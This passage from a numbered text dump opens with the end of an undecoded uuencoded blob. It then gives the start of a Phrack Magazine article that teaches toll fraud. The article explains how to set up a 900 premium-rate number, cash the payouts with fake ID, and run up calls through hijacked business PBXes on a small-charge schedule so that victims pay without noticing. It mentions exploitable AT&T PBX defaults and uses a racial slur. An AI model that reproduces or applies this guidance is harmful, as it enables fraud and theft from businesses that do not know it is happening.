  12580. MN]WZH92TM.TN#2F^1W1K`<RX],<N6_FA3<<\?/,%MECN=Q?^>K@_.FHX@=D$
  12581. M29M!*%[E\Q],+3BRQ6^X<(5[[E%\;\!;ZB6$U!+^Z.TZ+I]G7"&Y4.JJ?EI9
  12582. M^)I"QKK97Q'9&T-'<>6)Z@:DA"3U1=<.U?J"&O@E!B;,U"',=_?&.&8/H1^K
  12583. M"!Y7LJ."^/W\*R++;KD3)02N*EF2[3AT9HV1S3.+4!"N74'#.]HWA"EJJF"[
  12584. M4["*NC$8FD</+)$Y=3X@_C.&MLK'7GB8S$!T$0$,(Z;6_M*G#APU[*2E%'",
  12585. MY`&-8W-1X)U7"HYBUUHX!Y'7CAN\P"6MOU,XR$$;GU+\VCQVQH/HQSKPA>9.
  12586. M':J:ZP95K8G,I#_NWN";_P#)"IZX='A]K[=R9X4H6D&HO=74W*?<,W;WB&/V
  12587. ME&N/OP*NU1]X\7FC9Y::VL:T`!1N:,''#U2RHK-\;O,IU"#^9P@NT-?ZB>H;
  12588. M;6.&P()M@R4:`X:A4!],9:XDH,L:I7/IAYNS@\<.<O...-IF!W<1B"%1]IP"
  12589. MHO\`=.;AI+A55%PJZJX5;S)//*Y\KW'-SG9X#@YC&7[]@<<QB@UQ=J*2?HPX
  12590. M_)_BJQ62S5-'>Z>22*>I(,T;032[F@"0`YDA#D,*#@7CFDX0O%Q,4S;E:Y`7
  12591. M2Q!"VHB4]VP*%!)*N\"?3#7\8W">Z\57*OJ'/,DT[W)(5+0N3?<,A@N<USG>
  12592. M5JY8JS;D'$AO5,.QRAXGX/X7B?7O$T,P;YMH!>Y!H"G7PPD>;/&]?QQQ.ZY5
  12593. M0,5-$.[I*95$4?KXN.I.$U22?V2UN_8V3R.<3D`?'TQ2;:R1[0X/#21N&A]<
  12594. M4B)*YHWK@;-5NEIV,D(/=HT$>&`S#^=:`=7`?7C_U.?.2G!?$W,+B*DMEN#F
  12595. M6VC<'U-5(U8:8'JAR<\C(`_BQV+;:>R<L.%J"T6BC[Q\\K6ER-!D>Y`9)$`7
  12596. MW80G&W._C3@B_5T5^M4-;965'=BH@:YKV1N"M/@1TPXO#7,:V<3\%Q5-D7N:
  12597. M@?;!'E\0?7"6H80VX7N`A73#>-WJ$P`J(#+P3>J"<*V2CEC>S^IVD?7CF;FS
  12598. MRBO?"E%%>:,_>%GJ&->V>(>>`.T;(W\1&1PBN'ZZ2UW$/<TEI($C#D2,=$<L
  12599. M[M%<Z6C@J7L<VG;N;T[UA^R?U'UP.YM<-1\9\/S1T36NK+4`^D>-))"BL7U;
  12600. M^K!W9[)Q5PSRDHKE0M9-)88JBEKH8W?G#2SD2!S200=A+@1A<=EFZRUG"]?;
  12601. M3M=#3S-DB:#_`%G<4<U/R0H5/:F6'2>=D0D:S1SROLQYK\T>*>(.*.+[G67V
  12602. MX3UTC:F5L?>/)9&T/(`:W0`>F%YV4[1--<+W>6?9B;'2H0I/>'<Y/`HW#R<?
  12603. MU0H^57%DB"/?;Q"U>A>=NO\`E8*>%**./D7+3]TTM=;)2<D52K3^+"QX2J(Y
  12604. M+-;"\D&2BB<X*JHT`^W!%Q[90V_6BY4@<]HE80`$,;E!5I],\O`G"KJ@34&)
  12605. M02Y`OC@AXPIH:BW<1U-R<1;(*)P>&(I:T'=^/Z1CGVSVYUHG=1PAQ$$B;DS>
  12606. M-6_2,**[WV#ARQS\3&)IJ&'N;?&_\JH</M)JD8\WM3#+7.X5EPK'5=QGEJ9I
  12607. M';G/E<7.)/J<!97N)+CX8?;BN2*W4/`E,6[C#8J%P8GV4B,A^DN7`2V3"FLE
  12608. M3<0KWUCB3(HZE,\6L-T--6.>7G<,SX#+#;\SJYE1=0QKQ)(29)3_`%1\?7"7
  12609. M;DH(&,`>91UQJG=GXX>CB*(6+LL6V@*,FN<[)G]"X/=N_$!AGBUPC:NA\WNQ
  12610. M0$`YZ'`M_=OM1#,WB7,)^3MP$&2@8S&,\\O7!C9)8HZM[)V[XI6[2#]6,5$;
  12611. MJ.K$D)W,#MS')X:*/'`1Y>^:1[RKG$DD]2<''!<0K.)K90N!(JIA"[;U#LA@
  12612. M^YH\)0<+21-F>UTLPW,A'VD\2/#"(E<==/3PQ4Y`GPQNISQ:3-NF?7&MT``Z
  12613. M8SGL3HN-B'YV/^Z:OTX__]52<A[MP#;^"K-9>%JMG=%KMCWQNC?62M'G=Y@-
  12614. MQ75/9@RX_JF5%PB`)6,>0AI#F'WX1ERHI:T5PO+I:VVR1$302?9>#K[QAN^5
  12615. M%8_EKSBJ.#*N=S[)>]LUMF<<@7?8/H?R7>HP^[&[+I)Y?,]NUQ\,\%U9N[ZZ
  12616. MPEOE-*YJ#TS7Z\(SGI.8^4-NI5V_$,B:1_2`SP0V[@"Q\><$4L-9"(*D0AT-
  12617. M=$T!\&T)G_2:>H/NPT-;37KEMQE36N\N,E'O$D-1`X[9(B4+V'\;3H1A\.75
  12618. MY?<:=G?4KJ*BDGD%'*2K2Y`=I=HY0=>JX<*CY@\/\"TULLW$$!^"O%8^":IV
  12619. MK#$'-RWZY$Y>S"ML_*_A^VW+[TL-RKZ!M0>\+*>5IC<"5`"C3S9`KA8P6SN*
  12620. M:)CJFHER*F1P*KZ(!CS9YW<+UW!O-+B&P5P\]/5O?&\!!+$\[F.'H0</3V8*
  12621. M&"AY705Q<>^K9ZJ5H3(;$8I^C+WX-N?,YAY0<0PAJI%1MW*1F7C+VD84,$+*
  12622. M/EI<:4!`VWTT;,^KH6_CP;6BE%-;++&\(6T>TD>(&#B2W"ML\;B&B2,A\8/1
  12623. MPP%KFE\\<K2-R-=Z^&$5SZNE-1<H[M!&3\=<I&T$#0"'2/D<%!'H%.$7S"X;
  12624. MEM'$=OF+C'%/21LJW*=L1AC`<\^&07W89#F!?C?K[)-$#'1P_FZ6,ZA@ZG^J
  12625. M=J3@C=D1@19J.6YWB@ME.%FK)XX&?W3W`#\>'CXTKV73F'601#^Q+31&CA0]
  12626. M(FB('WAJ^_!%9WR/M3[>'%HBF):OY0\%P5<87UENW4M$AFD&XI^0OX980SWE
  12627. M\A<XDN<5)/4XHYW7&A=R@J,:$73W8.+[Q)=[O04%#75#I*>B"01]&A$_5@L,
  12628. M@+4&*9YIBS'$`CIC7`*4QK#D/7$F\M0C,C+V8'Q5D3HTE#FO1'.&8</48"R.
  12629. M8Z9Q:<NF+4U5/25,532ROAFA<'12,*.8X:$'`ZY7.NXDO-7<[]<#)4")3))J
  12630. M_:$:UH&7X$X*TV@GJ1C5&9.N,$@%3C+LP2,:W3/IBQ&0^G&PG;(P#JX?CQ__
  12631. MUE+Q-PKPY2<GZ.P5A-##2P,^$K86K)!*T*)&D9AQ=F?'/"7X;O\`>ZOAB@MO
  12632. M%$C'7&)6LJT3OHP?*_VHBX.[75-DIS3U.<;R<R$7QUPU7/:S1OX;J8F%XNO#
  12633. M\_Q=NJ`?M0.(+FKXC4>S#H\IN*(>+>!K+?"-TQA[FI:NDK<G*/KPH(*82SUD
  12634. M^W(L,>6I\N&XYY,BJ+98[9&0Y[(6N#3T&0PJN75&*#A6BC`+73Q,:`>@ZX0'
  12635. M%/"MOXPOO$O`MRD;%5L_LRRU1_O$I'F9_<.R4>_#-T%;>.&+K)PCQ!45%HJJ
  12636. M&0B"5Q)BC<3D)&:.B=T<,VZA1EAYN`N**#BIU;PUQK3ALK8VQUU,,VR1.""H
  12637. MA?H4R((],/-R5N-SX<?)P'?IOBC1-#K;6JK:NE/V'+XC0CIAUSYBP#-&@)X8
  12638. MX.^8/5"H[0E7"&[324%+"3_2\NX'_EI,+KDE'3T/*#AYSXV%\EOE<2N8!>[]
  12639. MN`W:,=%!R=N42'O):ZEC\^H1#IA5EG>6.F@<W[;Z-KAFGE:F?T84=Q1CZ9K5
  12640. M&S+Z1@?13?V.Z5Q&?0=$P67F'N:F64$B.0&0`=$&?[<,Q>;I+QE?*OB^>3?P
  12641. M]P:UXH7N;M;63@YO()Z9#W8/>>XN%[Y$5%WA'=5'=Q2U3&:]V[:7M\4_9CEH
  12642. M#<J'%7D)D/IPJ.2T,C^9%MJ86;WV^.>N#2%4P1.>/K`P9T$T\=35U,^9J9BU
  12643. MQ(S)3/$EQK64%-4U8)#VA(P"AW'3""JY9)9GS/)<]Q)+CJIQ34A<SBNNI3&M
  12644. M:A&6,G(^W7&1BS0I!'CC#QYDQDE,5(*%?JQ:+/\`'C*9!WKB[<B,\SKC(/TC
  12645. M%LMJIBH"Y^N>,!2H.F-1O77&':Y'&7.!!7IX8P'$#7W8E>$R]!BD?]=9Z.&/
  12646. M_]=)<0<3<2U[8ZF8`-BMLU0:=?(C<@`>J@X0_%7'LEYI>&XZ<L@J*6$M+FKI
  12647. MD4>T]<M>N'`M_&/$EELM'+<;5'7V\QB5E3'(-A:4)).9!"^&!'%]R;5W"@@K
  12648. MJ,T%5/&/A6SN#X*V-V>UDHR+OZER'!1R1N5/PUS.O'"C&.@H;NSXNCC=_>IV
  12649. M#SM'[,/;3S!D0<@V$YY_:*81MYH/O/C&DJFL'<]T&.)"@!H.N%#/*R*>V4P+
  12650. M6M:I]G0)AH>==TEX<YP6:]0.`<TMWH<G-T_$<*3GOP!2<R^$J2ZVMK([Q!#O
  12651. MIY!I,PA>[<?!=#T.&"X)N=SMEX98;HQT%TM<CA0]^K7-</MT[S_1?^3GDY$U
  12652. MQU?R?N[./>4EJO-O);<K#4/@:R1`]H"*QWM">\8>'AVZ_>5#WI6-[1M>T]'#
  12653. M'$_S!8Z6/G33NCCD;6S6Z)]6]Y!$A4AA"?U(0X5/!M*;/P_1T4D\S^[H*5B!
  12654. MH<T.<-VT>'KXX).T+6.J>&[93N>HN-YC[MBC+8$)'O.'%M=4VKEDI(W,/=RL
  12655. M(.:(QY"8.+[4`&*1K@`YX&[P_C@505H/#I>XH]CB22`%"X"<3U+);`97?G(V
  12656. M92-!U8_RN&7MPTG,^HH*#EOPIP;8]K(+Q<8XR&'6-C_/]:+AR(&4UPX1O%N>
  12657. M`8B9H=O]2B?BQQU>J*2VW>MH)0CZ:9T;O<<!"%S\,+_DBYULH.+N)]N[X2A;
  12658. M0Q^CZIVTGW,:[$4)-18G;7$U`D=*UO5P)PF^*KB:NICC7*-H[SP+^OT8*.I!
  12659. MZXP=,M%TQ55*XRU%3PQDY$D:CIC<T7$D3F^S&'$+X8KEN`QDKTQDA!GC!&0S
  12660. MTQ=A\VF,DYJ<O;BP0,5=,:=%&,-*D_@N*EQ!RRS.,@G4>&?IC.C2O7&&@J/7
  12661. M%W.)>>OAC8?ZZP#JX?CQ_]!N+#=F<1\"2T44@8:NE=##*3G`\ZL/H2$&&RXZ
  12662. MII[3>[;%6TS8IHZ/NR1^66J&GVX<FU2&X\MFLH:I(Q;9Y:N)^;8PU"&@C0E,
  12663. M+:TWNUWW@&@H+Y3;Z>>GBW2$*W/0K^21T.N$G=832U=+/-**FLM4HJK9<&_:
  12664. MJX(_MQO_`.$:W(^(SP\EIKH:VW0U,#PYCVM>PGP.>$W=ZB2RW%M7'(YU-.YX
  12665. MDC5=CUZ>&#:Y5;?B+>]&H1EGHN&A[5D3A<K=419Q/B0$C1X/Z\+7L\W^2X\"
  12666. M4L3GD2P';F=`#IAMNV;!3#B2R7FF9W=5)&Z.>1@3<6$%A7Q&8^C"G["?&8H^
  12667. M8MQL<[PV#B:F,T34\K:R$'>!ZN:IQT_9G&AN=1%)M;'*_=&1T)Z'')7;M$5Q
  12668. M[2EIH8B-PM]''*0--SW'\1P(EO`F>(82\,EJ0>]:"58QN0!Z9X1_%U>VY\0<
  12669. M!6\2=Y(VJDJ91U:K\L_\G7#D6"X.I[C6P1,#I'U,OG`7:W>2GUX4'%%4RGX=
  12670. M9+(WS-<"<^N*6B[,=PM4RAQV[7G/UTP45EU?)R]N9W?G&4\A9M/4:989O@NX
  12671. MF[<P.$8YBY[+;&Z0@?[QSG//UD8=_AV].AIZV%Q;^>J)=3T/3#"\X8XQQ;-5
  12672. M1#RS#SGQ<W(G"47PPX7#S_@N0%?(QS1]X7W9(",W"&#RI[#(<)MU9);G5$;W
  12673. M$`1!T!\"?#TP0.=N4NS+BI/KBOFW9G&<W-Q0JB?@<6"#77&4R.,*C1ZXL#D<
  12674. MM<:5#L],9&9T4XUI*E<;J=,:/33%HSX!<9<5<GXL6&87H,88[QTQ=I"Y]5Q0
  12675. MM!.B>F,A0$ZXP2NX=,9C!#QBSPCT.1],;$4E:HSW#'__T>6>7'$;K)<2R<=[
  12676. M13A)H2=?4>!'3#@<=,I^*[!30-D8^6#.AJUS<.L<GKX'"$LMXN_#]15VB3<R
  12677. M.9I9+#(H!!PZW*_BRWUM@IK%7I"VH6%KOZ+E\N?@,*'F!P]'5<*MN=MF9%<(
  12678. MSO;M'EE>S+<G0N&1\>N";D!QR9*62P7/=#44SRQC79(%R!]FF'`KWLJ:RZ4+
  12679. MO.T".9%Z(A'T8++C=8_NFS[7?9=M&X9^4IGA%]J&??8J26,IN<&$=#U!P!Y$
  12680. MW,4M.0R;R2",L8>A_*P5=I&H-UJ:WNW;FT`C<,DZH?QX;OEWQ#4<-\36F\0.
  12681. M/>6NOAJF#Q#2CQ[QCT1M-?3W-E/6P>>"IB9+$X=6N`(_'CB7F[Q`+UVH.)+T
  12682. MYQD@HZM[8B%^Q`W8U/>,1R<0[(XH7N,1:U\A7R[G/T1$\=<$O#<[9>9-&YA\
  12683. ME)3(TN.A(S^MV6'0X3N8CDJ9&(72;Y$=F7*_!C?N(H7TM%""2V9ZN+NGHF"N
  12684. MTW^&'AVH@5$<X.:#@D;Q`V'A^\0]YF&JT'P]?'"`Y4U0@XPCJWNV*X[2FA.'
  12685. M'AOE,V"M[US`WOY';AT(Z^S#3\87,7.HED`\@D):?;E]>"1VN7N&%;QW'/9F
  12686. M4G"AF$D5!&V5X:$_/3,:YY/J,F^["6K*R2>*"-Y4QA`>J8#CVXL`4\5QH)##
  12687. MC!")[,9:$&?3&=3[L8^T!B[AEC"@-5<9.BXT:XSUQ54TQD@@`G5<60#TQ-11
  12688. M-GJ(X"\0A^6]ZH/:F(W`QO+3J,:OF4XRNAUQD$%GKTQ0$A>O48LP$J3TTQ9X
  12689. M.\JO3&(EW-)&6X8__]+C9S7,+'C+PPK.7UTJVU3J9AW-<TG8[1V!_$GW=?GQ
  12690. M"1YI:R$%HWZZZ+U'MP3P_'6*Z4PD+C''*"'`Y9ZX</@/BZ>LX?N5JK92]M.X
  12691. M&!QUVDG+W81_$-PEM7%-'>8?+N=M>]NKR/'#K67B1M9''7LD\[X@'-'H,L`N
  12692. M,KNV&:VM!#6E[I-OH7=<)3G[=Q76^VAKVK(KBAR('I@IY=70T<-(YKCY9!D-
  12693. M1XXCXTN'QQX@(<K9(\QZ#,8;[>A;ZA#CMSD1?I6=E6"^MF:*FWVBIVN?H'0!
  12694. MX:O^:,<:62ME^,K:N1Y=+.#N<>I<5)7!I67)J2A226-:"1D`,1<,UO<<2U56
  12695. M\HC4S_#TP>TM_EIIA(R3/8!G_=8M>^(7R/HTDS:,P.F"YUZF:V4%RAZY=,`*
  12696. MNZ.^$JF`_P!=;@JMM2:9S7,)#@Y5&#*INDQIYH0XK*[,'5#@!55+^Y-.`QK"
  12697. MFX)F<14+-M2V=S"^*G<Q\GL73WXFX@NL]TO59=*G.6K>YQ]%T'NP7(A!(R.A
  12698. MQ7VKC.Y,:PYN!Q@DD9],6;HA'\,:#^),:OD'3%@NT8R@.,M`W$8U&D'&2%`"
  12699. M?QQ@YGW8W-<657)C+D7+/+&%)]4QH*%?HQE0&KH?`8UA.UV-<>AZ#&AVUOMQ
  12700. M=0`N,,=YUU0X_]/CF1KVHQX+7`9@],">':MU+=J:8%$<`??A4\;LBJ6TU=&`
  12701. M)"O>C371,$L5QJ88C#(1/"<BR3I@3:IF-;4_".,7>@;@3EKTP"O514OBDIYW
  12702. M;VJH!]-",&%EX@J(+3%'&_:]HVCW8GN5ZFJMLDLA<X#+TP6\8W!];3VV,N),
  12703. M<9"GVX@X>J_AXGM+OM'+VXBJ:PNCK\SYVI@GE*,C*:`X=>AX[J+7V4/W9II2
  12704. MV6X76>!P&H@1KWCWJGOPUE([:UB'(E2!B03/3S+F[&*:1[9YB#F[+$IJ7=T]
  12705. MOB$3$<D[G-85T'OQ@RG+,D>&*.>2$7KB-Q0@C$ADT(Q&Y^YY51BYG2#NFY!Q
  12706. M5WKX8A55S]V-Z@!,;D<S^!QKAT&,L"C]>-3:4\<:Q,\\],9R&:8UOCC0@UUZ
  12707. MXRW4'IC)<=RG%H@H!3/&7'\X!IC#E)5<9*@8UP*A/JQK043IC222@_%C#@GI
  12708. MB^L:'Z<"[-;YJVH='#%+*&-W2=TTN+&^)],!9V/9,]A'F:41,4?DF6+$G8$&
  12709. M>,-^T.G7'__4:FY<)\MN,J22\45Y%JG#=TJH0XD:;2GU89SB.DI+?>):>AJV
  12710. MU<,;D9,&[=WJF!55<'2VX1[R<ADN"YU0=I;T(SQFFJ"QQ0XO45(E;GJ-,!(Y
  12711. MB-R9:XNZK?W0:OIB.IEWOC:N3!IC$4FT.(.1Q224H3ZKB![@0,")*V1]GIJ#
  12712. M^]1322CVO#0?^8<0!R#(8T/SUZKBS"-WH3IC7KN('3&6]!].,.3=Z8UZ$>_%
  12713. M.F?3&5"Z]-,8'F/7&2A!0:8PF6?LQ@-*!>AQD-&[15QK@CR#I^+&6_BQ@IH<
  12714. M:UJ8L_IIGC+<F^/B<8(4G&A/M8L&C;ZKEC6NS3Z,:"5STQ;,G)`O7%0"`N,A
  12715. MR+GBV0(`/7KC40G0G&N'MSQ;:0P>N.DNQEPHR/ANNXBJV;)*Z81T[SKW3-?<
  12716. M7?BPWO:RX5;P[S3GJ8`!2W9@JH]@0-=H\9>H7WX:\MSU7&4!8T)IKC":98__
  12717. MU>7N,^#>(N#+?3OOH93NJ\HH&R`N(`S*#IA*.>3M)T]<7=*[:$/33%)'$E0=
  12718. M<8<\KEUQ9KT:`3B-SD7&&DG48T'-<:=!C"E"#]&(W`9^F,`+IB[6D#W8QET]
  12719. M^+M"$>`.+EI13C"'7(>F,:I^/&?7IC#PF7T8J1GI].-"H2GKC>N>0.,H=I3&
  12720. M!D`$Q4NSZZXL=1C6E.N,`+J,UQK3YD_`8L4W`!1^O&?8<L8&J9C$D@#6Y%1Z
  12721. M8J$))7IC#<B5Q@9N(7+$FYH\<#;(;2*MYN[:E\&T[12N:UX=T/F!"#PP%JVT
  12722. M_P`5)\(9#`OD,H&Y/5,L88`H*XPY5'@N,M.XG3+QQEH.W7'7/(N_0R\M;$9(
  12723. M640;`&1Q-)(VM)`(7JY%/KA/]L>B@K^75MNL;`Z:BKFM<_J&2M_60,<T%,6"
  12724. M$`#+$?A^O'__UN0.);Y=+[<#6W:JEJIR$W2%4'@/`8`$J$Z8PX^7+IBH<JIJ
  12725. MF,`DCV8UKB24]^,A,9Z$`],5:JMZ^.-)(5?=C0NUY/ABA)&1QK?M*-,:I4C/
  12726. M/&YKD%Z)B6,*6J$],.7R+Y,\3\QZQM1&TVZS1N2:X3M*'Q$8_*/U#J<.GSQK
  12727. M.7G)[A6GX/X0MM+77R>,.J:NKB9*]H\7EP.9Z-"`88BGXBM=7.X7FQ4DP>5,
  12728. MM(3`\>S;Y?JP+J/[6E33L[D7NAET<%BE8/7,-.`?$%FX2AHOB+/Q"^JE0?V/
  12729. M44CHW'_*!(Q#P[P5?+QP]77VF%-';Z0ELDU14QQ@O`7:T.()/L&$Z[++PZ8W
  12730. M-0<6/7%22H&,.T],:N6>6-"*4Z=<9!R&,%%)T/3&C)/'3%F$:Z'&7.5V6,G\
  12731. M?3&#EC00I!14QI`!Q=N@&,N`7W8P6^;/(>.+L:`Q0537$;CYRGCBRC7KBS#D
  12732. M<\*#A7C/B2P!C;;7O;"PK\/(CXS_`))4?1@_XYYH5?$W",EFJ:%D#GNC>]\,
  12733. MCBPN:==KE3Z<('73PQD+M7&MS(:$S(3WX__7XQ+24/TXRB-]F*N4(<834XPB
  12734. M%<8:JD#)<9VIG^+&%R.-"KX^F,D$*NF,`(UWKBI`5<:QN8(Q<-)<@\<"K705
  12735. M=QN$-'0T\M54RG;'%"PN>\^@&.DN079HF_L;B#F''L`(=#:`<SU!F(_Y@'O/
  12736. M3'3-'1106UE-!&RGIH6`,CC`:UC0,D`QS/V@N.N4M9Q346:YV=]SFIGF.>LI
  12737. MP&/C<,B`\$%R?1A!VNS\@*J<3SWF_4K.M.8FE/8Y#@Q=1=FZF#TGOM46`H'/
  12738. M0/\`H;@+>G<@6<)U=5;[;=9*T';%&:LAP)ZE00@]F&@J)(Q-)\+O$3G*&2%<
  12739. MO7QP'<U7*T)XC&7!6KKC&TH`!GUQ@CS:98P6YIZ]<9`1%U\<9V^7QQ5P/TXS
  12740. M&$U"CIC(;F2N-`S7PQ/2Q1?$1]]N$9/GV?:3T7)<")8K:US@'U)1F3MK,W>Q
  12741. M=,1US**2HB;;14.!8-PFV[B_JFWIB!K-24.-[O&0S,'3%FLW(%Q;NLS[-<8V
  12742. M@(NN,]V-0/;Z8J6!2N1.,L8!F,9:T8JY@7%B`<UQI)VIT7&8A^>BR4;AE[\?
  12743. M_]#CAC02`7!H(U/LQNT$(,5>S14QC8",L5+"FN?AC#8T;HF>+=V4\!Z8PZ-"
  12744. MO3&!'H@Q>6)'.:"J?E#KBO=J,5[L^&#NKX<FH>'[=<*M637,K14P'GDC!3>?
  12745. M0G)OCA]^5?95K+I2TU=Q9=#1=XQKW45(P&1BYHY[L@4\`<="<N>6O!_`-*8N
  12746. M'K?'!+L22JD\\\GM><_<$&#FMN"1%C2&L5'N<>F"'F`^[5_!MSI.&)@ROF@<
  12747. MV"8Z-<FH..).*.6W'UNKI#<+-52.>\DRQC>'GJ5"_7A;<K^SQQ!?+;]\<35\
  12748. M'#5",VB<!TS@.NU0&CVE?3"MAY5\B+;+)!<>)JZY3Q,<^3NI&-;EJB-_7AB^
  12749. M9/[HNO\`*W@V"NAH&D@?'2-<YY'4(`@/KA.[%`7%S&05.6*OCS4=<5>PYZCP
  12750. MQ5S"'EI(RQ@M77%MOE]1C+(\E\<9,3E3(>"XD9"0C2-<9$;03N(SQ4!HZ;O;
  12751. MBP?H&A/4XH\%[E.-#"`=I0XUC-H"XRFYR#^6+M8"$U.,AAU&+M;D6IGTQCN_
  12752. M*AUQH9TQEL6>?08T1H0-1C0P;O#%96(5],9:S(?KQC8?#0]<7B82^,`*2X``
  12753. M>W'_T6,FU_R<`ZG^NC^YP67;^M8+G?UKW#`*?^M'WX`RZ#WXPW^M^[</L.
  12754. M*-^T[V8R_0XJ[0>S$U)^7AT^+/\`R8_+G_G$MG_,0QV[;?L2^W`:_P#^!S_W
  12755. M+\)"H_Y#5?L&+TO_`"!/_&F_BQSKQ7_R3N?_`!YWX\!>(_\`H2![3^/#957V
  12756. MY,%%;_7&^T8@G^WC6?8.,.Z?W)Q)1_:/MQ,[5OL.+5&@]F-I?LG`B?1OL&*U
  12757. M']:;[#@#U;BT'VCBSOM8Q/\`:?[\1]?=C`T^G`V'^M,]^)&ZGV8V;^M'VG`'
  12758. MJ?[H8M_?/><9Z^[$[/ZZSV8Q-_7!BU/I)BQZ8I)U]V,0_9=C%-]L^W%:?_#8
  12759. 'O^.-_'C_V7C_
  12760. `
  12761. end
  12762.                               ==Phrack Magazine==
  12763.  
  12764.                  Volume Five, Issue Forty-Five, File 18 of 28
  12765.  
  12766. ****************************************************************************
  12767.  
  12768. [** NOTE:  The following file is presented for informational and
  12769.            entertainment purposes only.  Phrack Magazine takes NO
  12770.            responsibility for anyone who attempts the actions
  12771.            described within. **]
  12772.  
  12773. ****************************************************************************
  12774.  
  12775. ****************************************************************
  12776. *                                                              *
  12777. *    FRAUDULENT APPLICATION OF '900' SERVICES                  *
  12778. *                                                              *
  12779. *    by CO/der DEC/oder, of Dark Side Research                 *
  12780. *                                                              *
  12781. *    Greetings to Minor Threat, The Conflict and Tristan       *
  12782. *    and dedicated to the English Prankster, Phiber Optik,     *
  12783. *    Louis Cypher and other hackers who have proved an honor   *
  12784. *    to themselves and to our community in not cooperating     *
  12785. *    with "law enforcement."                                   *
  12786. *                                                              *
  12787. ****************************************************************
  12788.  
  12789. The information presented forthwith is the result of knowledge gained through
  12790. actual first-hand experience.  There is no theoretical aspect to any part of
  12791. this article, except where explicitly noted.  Disclaimer:  this file is for
  12792. outright illegal use.  I sincerely hope publication of this file contributes to
  12793. the delinquency of both minors and adults alike. -- "Codec"
  12794.  
  12795. Getting Started
  12796.  
  12797. In setting up your own 900 number, you earn a big percentage of the net revenue
  12798. generated by calls made to that number.  You can advertise and promote your
  12799. number in various and sundry ways in an extremely competitive environment,
  12800. or--if you so happen to be a hacker--you can simply dial up some PBXes and call
  12801. the number yourself.  Since you'll be earning several dollars per minute, you
  12802. won't be in any hurry to hang up.  In fact, you may find yourself letting the
  12803. phone stay off the hook while you chat on IRC or read the latest Phrack.
  12804. Though not a scheme to get rich, this can provide a considerable income or
  12805. simply an occasional bonus, depending on your h/p resourcefulness and effort
  12806. exerted.
  12807.  
  12808. Before you can start calling your own 900 number and making yourself money, you
  12809. need to buy into the 900 business.  On your next outing for the latest copy of
  12810. Hustler, grab a USA Today.  In the classifieds, (as well as many other business
  12811. classifieds), under the heading "business opportunities," you'll notice any
  12812. number of 900 ads.  You want to find a "service bureau" and not a simple
  12813. "reseller," so shop around and call a number of the companies, asking about
  12814. percentages and whether or not your setup costs (usually ranging from $300 to
  12815. $1500) are comprehensive for the year or whether you'll have to pay a monthly
  12816. fee.  Avoid these pesky monthly maintenance fees.  All sorts of 900 packages
  12817. exist, but you want an automated service--such as a dateline--that is ready to
  12818. all as soon as you've paid.  This means you'll have no equipment to set up, or
  12819. 900 trunks terminating at your house, or hookers to hire, etc.  The service
  12820. bureau provides you with the number and the service, so all you have to do is
  12821. market the number (should you be legit).  You can bargain a little on the setup
  12822. fee.  An example of a worthwhile deal would be as follows:  an automated
  12823. dateline number (similar to a voice ail system, only you listen to personal ads
  12824. and have the option of leaving a response) for $750/year, a per minute rate of
  12825. $3.99, and a 75% net return (i.e., you make about $3.00/min).  AT&T and MCI
  12826. provide 900 services to the service bureaus.  AT&T is preferable, as you
  12827. receive payment two months after the end of the calling month, as opposed to
  12828. three months with MCI--so ask about this too.  Your continued efforts will reap
  12829. a monthly check thereafter.
  12830.  
  12831. The service bureau actually sends you the check.  You'll want it in a personal
  12832. name to make it easier to cash with your bogus ID.  Some bureaus will "factor"
  12833. your account, meaning that if you've accumulated a lot of credits, they will
  12834. pay you in advance of their getting paid by the carrier--for a percentage fee.
  12835. Don't try to scam them on this; your account is scrutinized closely before a
  12836. premature check is approved.  If everything is done properly, both you and the
  12837. service bureau will be happy.  [That's what's so great about this project:
  12838. everyone wins--you, the service bureau, even AT&T--only the PBX owner loses!]
  12839.  
  12840. You will be able to check your credits, or "minutes" as called in the 900
  12841. industry, by calling a special number provided by the service bureau.  After
  12842. entering your account codes, an automated response will give you statistics
  12843. such as daily call reports and total minutes accumulated for the billing month.
  12844. Be sure to find out about the virtual end-of-month date.  The end of each
  12845. billing period is not necessarily the last day of the month.  Accordingly, you
  12846. will need to plan your attacks with this in mind, as we will discuss next.
  12847.  
  12848. Getting A Date
  12849.  
  12850. Now that you've set up your dateline, you'll be anxious to start earning the
  12851. three bucks a minute.  The dateline makes it kind of fun, since you get to hear
  12852. all kinds of ridiculous messages and the typical horny soliloquy.  Get a
  12853. speakerphone if you lack one now.
  12854.  
  12855. You don't necessarily need PBXes--any outdials you find that complete a 900 call
  12856. will suffice.  However, the lines targeted must be those of a business, one
  12857. that is large enough to own a PBX.  Calling on residential lines, cell phones,
  12858. or from small businesses will not work--the owners will get their bill, and
  12859. simply call the phone company and complain that they didn't make the call.
  12860. This will attract undesired attention to your line by the LEC and your
  12861. service bureau, and it will also cost you in that the carrier connect fees,
  12862. about .25 and .30 per minute, will be deducted from your account.  The LD
  12863. carriers get theirs, whether the party pays or not.  This is why the calling
  12864. method encouraged here is the PBX.  If you can manipulate central office
  12865. switches, do so by these same principles.
  12866.  
  12867. PBX owners tend to pay their phone bills--including 900 calls that aren't
  12868. outrageous.  They'll assume that one of their own employees made the call, if
  12869. they even notice.  Instead of attempting to exploit a PBX to some astronomical
  12870. degree, you're better off running up a mere fifty to sixty dollar charge.  Do
  12871. this every month as part of a schedule.  Not only may it go unnoticed, but you
  12872. are assured that it will go uncontested even if detected.  Running up an
  12873. excessive number of minutes risks unneeded attention and assures either a total
  12874. "killing" of the PBX, or at minimum, 900 restrictions added by the PBX
  12875. administrator.  Even with a remote admin access, your luck will run out.
  12876. Remember:  YOU WILL ONLY GET PAID IF THE PBX OWNER PAYS THE PHONE BILL!
  12877.  
  12878. With this in mind, the most limiting factor is the number of PBXes you can
  12879. accumulate.  The widespread raping of AT&T's System 75/85/Definity in 1992 (as
  12880. a result of discoveries in 1991) made that year extremely ripe for this 900
  12881. scheme.  Many of us managed to accumulate large collections of System 75s,
  12882. including the elusive Super Nigger, who allegedly compiled over 300.  (Where
  12883. the hell were you hiding?)  AT&T security memorandums have since killed
  12884. hundreds of these, but the defaults still work well in some cities.
  12885. Regardless, PBXes abound, and the more you find, the more minutes you can
  12886. generate.
  12887.  
  12888. Let's look at a sample attack schedule:
  12889.  
  12890. PBX #           M       T       W       Th      F       S       Su
  12891.  01             15m
  12892.  02             10m
  12893.  03              8m
  12894.  04                             14m
  12895.  05                             16m
  12896.  06                             24m
  12897.  07                             12m
  12898.  08                             13m
  12899.  09                                     16m
  12900.  10                                             2m,10m
  12901.  11                                             13m
  12902.  12                                             4m,4m
  12903.  
  12904. Twelve PBXes are to be attacked in the sample week, so there are probably fifty
